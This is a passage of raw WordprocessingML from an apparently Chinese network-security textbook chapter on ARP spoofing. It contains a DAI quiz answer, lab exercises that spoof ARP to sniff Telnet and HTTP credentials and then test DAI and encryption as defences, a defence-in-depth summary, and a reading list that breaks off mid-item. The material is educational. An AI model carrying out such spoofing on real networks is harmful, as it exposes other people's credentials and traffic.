          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提取题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2（回忆</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> DAI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">动态</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">检测（DAI）如何防御</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗？它依赖什么前提条件？当终端使用静态</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP（非</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">分配）时如何应对？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提示</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DAI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的核心机制是什么表？这张表是如何建立的？对于非</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">设备，Cisco</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">配置中需要补充什么？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">解答</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DAI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通过截获交换机上所有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">报文，将其中的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP-MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">映射与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP Snooping </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">绑定数据库进行比对。如果</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">报文声称的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP-MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">映射与绑定数据库记录不一致，DAI</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">丢弃该报文并向管理员告警。其前提条件是：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">必须已启用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Snooping，交换机需有完整的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP-MAC-Port </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">绑定数据库。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对接入非</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">设备（使用静态</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的主机），管理员需手动创建</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ACL，将静态</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与其合法</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址绑定，再将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ACL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DAI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">过滤。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">迁移任务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1070"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">半双工与全双工</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> MITM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">对比实验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：仅执行“欺骗受害者”（不欺骗网关），对受害者发起</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Telnet，观察攻击机是否能嗅探到入站（服务器→受害者）的流量。解释为什么入站流量方向不同导致嗅探结果差异。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1070"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">DAI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">验证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在可配管理型交换机（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cisco / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">华为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / H3C </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模拟器或实体设备）的拓扑中搭建与实验相同的三机环境，按防御对照框中的示例配置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP Snooping + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DAI。重新执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗，通过交换机的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">show ip arp inspection statistics</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查看丢弃的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">报文数量，从</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Wireshark </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">层面验证欺骗是否被阻断。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1070"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">加密对抗</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在受害者上安装并启用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTPS（自签证书或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Let‘s Encrypt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">风测试</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CA）替代</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP，用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SSH </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">替代</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Telnet。重复</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗，在攻击机的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Wireshark </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中观察是否还能提取凭据信息。记录加密前后的差异，并讨论「仅凭加密能否完全防</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">MITM（提示：考虑证书校验严格程度）」。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="116"/>
    <w:bookmarkStart w:id="117" w:name="小结-7"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">小结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1071"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">协议的无认证设计缺陷</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，通过伪造</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应答将受害者的流量重定向至攻击机，形成中间人攻击。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1071"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">完整的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> MITM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">需双向欺骗</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> + IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">转发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：同时毒化受害者与网关的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">缓存，并开启系统</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">转发以确保流量不间断。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1071"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">MITM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">使交换式网络中的单播流量窃听成为可能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">——原本在不欺骗情况下，攻击机只能看到广播流量；毒化后将目标主机的单播流量导向自己，结合</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Wireshark </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">即可重构会话。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1071"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">明文协议（Telnet、FTP、HTTP、SMTP）在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> MITM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">下毫无秘密可言</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">——凭据、会话</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie、数据传输内容全部暴露，这从实操层面验证了第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 6.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节“加密使嗅探失效”的论断。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1071"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队多层次防御</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：DAI</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP Snooping </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是交换层防线；静态</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是终端快速加固手段；端到端加密（TLS/SSH）是应用层保底措施；异常</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">监控（arpwatch/Snort</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规则）提供检测和溯源能力。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1071"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">任何单一防御都不够</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：攻击者可能绕过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DAI（如通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DAI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">未覆盖的静态</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP）、绕过端口安全（MAC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">漂移时间窗口），但端到端加密和网络分段（VLAN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ACL）会大幅提高攻击成本。纵深防御原则在此体现得尤为充分。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="117"/>
    <w:bookmarkStart w:id="118" w:name="延伸阅读白名单-3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">延伸阅读（白名单）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1072"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chris Sanders 《Practical Packet Analysis》 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 5–7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章：以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Wireshark </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">视角深入理解</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通信，本书第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 6.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节和本节的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Wireshark </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">调优均受其方法论启发。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1072"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Richard Bejtlich 《The Practice of Network Security </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Monitoring》：第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章“Network</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Security Monitoring on the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Wire”讲解了如何在生产网络中部署流量监控和异常检测，是蓝队对抗</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MITM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的完整实践指南。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1072"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">《从位到物联》第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 24–25 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以太网与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">原理：本书信源的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
